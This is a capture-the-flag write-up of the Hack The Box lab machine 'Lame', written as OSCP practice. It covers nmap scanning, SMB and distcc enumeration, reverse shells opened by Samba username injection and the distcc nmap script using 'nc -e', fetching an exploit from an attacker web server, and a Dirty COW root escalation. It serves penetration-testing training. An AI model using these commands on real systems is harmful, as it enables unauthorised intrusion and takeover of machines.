Hack The Box: Lame Write-up (#1)
Hi there! This is my first write-up on HTB retired VMs. Firstly, I would like to thanks the 2 infosec professionals who are my great inspiration to write up this blog, Rana Khalil and TheCyberMentor. Please do visit their Twitter for awesome updates. I do this writeup in preparation for OSCP certification based on TJ_Null’s OSCP like VMs list.
I will first start with Linux boxes (first column) in the list from Lame to Mango and will continue to Windows boxes. This will be a series of write-ups and will continue to release new write-up whenever the list gets updated. I have included the hacking methodology in this write-up (will be included in every upcoming write-up), #1 Reconnaissance, #2 Service Enumeration, #3 Exploit and #4 Attack Strategy Map. This will help you keep track of your activity. Please enjoy the rest of the contents.
Reconnaissance
Let start with quick nmap scanning.
nmap -sC -sV -O -oA nmap/basic 10.10.10.3
- -sC: Default nmap script
- -sV: Service/version info
- -O: Enable OS detection
- -oA: Output scan results in 3 different formats
We got the following results:
- Port 21 — Running FTP service of version 2.3.4
- Port 22 — Running SSH service of version OpenSSH 4.7p1
- Port 139,445 — Running SMB service of version Samba 3.0.20-Debian
It is always good to run a full nmap scan to leave no stone unturned. Let do that as well.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.3
- -p-: scan all ports from 1–65535
We got the following results:
- Port 3632 — Running Distributed compiler daemon (distccd) of version 1. This port we didn’t find in the quick nmap scan result. So its good to run a full scan.
The last scan we need to cover is the UDP scan. Let’s run the nmap scan for this:
nmap -sU -O -p- -oA nmap/udp 10.10.10.3
We got the following results:
As we can see all the ports are either closed or filtered.
Now, we have 4 potential ports we can go for the next step to enumerate them.
Service Enumeration
In this phase, we enumerate ports and its service to find if anything misconfigured or version vulnerability exists.
Port 21 vsftpd 2.3.4
A quick google search revealed that this version of FTP software is vulnerable to Remote Command Execution and most the exploitation done via Metasploit Framework. We not going for this method to use to keep ourself adhere to OSCP exam standard. From the basic nmap scan result, we can see “anonymous access is allowed”. So let’s try.
Nothing much interesting we can find here. Let’s use nmap vulnerable service script to check if this version of FTP service is vulnerable. The default location of the script can be found here:
ls -1 /usr/share/nmap/scripts/ftp*
Let execute this script against our target machine on port 21.
nmap -p 21 10.10.10.3 --script ftp-vsftpd-backdoor.nse
The result shows this version of FTP is not vulnerable. So let’s move to the next in the list.
Port 22 OpenSSH 4.7p1
SSH service enumeration I always put as the last option when others seem to not work to open a door to the target. A quick search on this didn’t give much info. Let’s move to the next.
Port 139 and 445 Samba 3.0.20-Debian
These ports most of the time gives you anonymous access and open a door for you to the target.
Let’s try with the basic enumeration with smbclient and smbmap to list the shares and share’s permissions respectively.
smbclient -L 10.10.10.3
- -L: Get a list of shares available on a host
smbmap -H 10.10.10.3
- -H: IP of the host
Great! we have one share with read and write permission. After googled this version of Samba for its vulnerability, we found one suitable CVE which works on Linux system, CVE-2007–2447. The exploit is here. Basically there is a misconfiguration in the smb.conf file, in the username field. All we need to do is to change the username for authentication to:
username = "/=`nohup <our payload comes here>`"
We keep this in mind. Later in the exploitation phase, we will test this exploit. We proceed to the last port.
Port 3632 Distccd version 1
Google search on this port and service reveals it is vulnerable to remote code execution. Nmap has a script to check for distcc vulnerability.
We can confirm this by running nmap script with the following command:
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse
Excellent! It is vulnerable. Refer to CVE-2004–2687 for more info. This can be exploited using nmap script as mentioned here.
Its time for exploit! Let’s get into the business.
Exploitation
#1 Samba
Set a Netcat listener in your Kali Linux.
nc -nlvp 4444
Login into Samba:
smbclient //10.10.10.3/tmp
Then logon with below code:
logon "/=`nohup nc -nv 10.10.14.3 4444 -e /bin/sh`"
Note: Please change the IP above to your Kali Linux IP.
We successfully received a reverse shell from the Lame box.
Grab the user root flag.
Grab the user flag.
#2 Distcc
Set a Netcat listener on your Kali Linux.
nc -nlvp 4444
Execute below code in your Kali Linux.
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.3 4444 -e /bin/bash'"
Now we got a reverse shell from the Lame box. If you notice, the user is daemon.
We need to escalate this unprivileged user to root. Alright, things getting interesting. I googled for kernel 2.6.24 and got this exploit from Exploit DB.
The exploit can be downloaded from searchsploit in your Kali Linux.
Set a simple python web server (default port 8000) in your Kali Linux to download this exploit to Lame box.
python3 -m http.server
From Lame box download this exploit.
wget http://10.10.14.3:8000/40839.c
Note: Please change the above IP to your Kali Linux IP.
Next, #1 you need to compile this code as mentioned in the exploit. #2 you need to execute the newly created binary.
So let’s compile:
gcc -pthread 40839.c -o dirty -lcrypt
Execute the newly created binary.
./dirty <your new password type here>
So what happened here? If you have read this exploit, it says basically it backup the existing passwd file to /tmp/ directory and then it creates a new passwd file with a username ‘firefart’ with root privilege.
The code is successfully executed. We can confirm this by ssh from our Kali Linux to the Lame box as ‘firefart’ user.
ssh firefart@10.10.10.3
We have solved this machine in 2 different ways. Nice!
Attack Strategy Map
Thank you for reading. Next box is the Beep.